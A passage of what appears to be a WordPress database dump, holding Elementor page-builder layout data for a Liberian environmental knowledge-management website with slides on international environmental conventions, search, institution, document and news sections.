More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}]},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\"}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\"}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\"}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(27015,3932,'_elementor_version','3.4.0'),(27016,3932,'_elementor_template_type','wp-page'),(27017,3932,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27019,3932,'_elementor_pro_version','3.3.6'),(27023,3933,'_wp_page_template','default'),(27024,3933,'_elementor_edit_mode','builder'),(27025,3933,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}]},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by 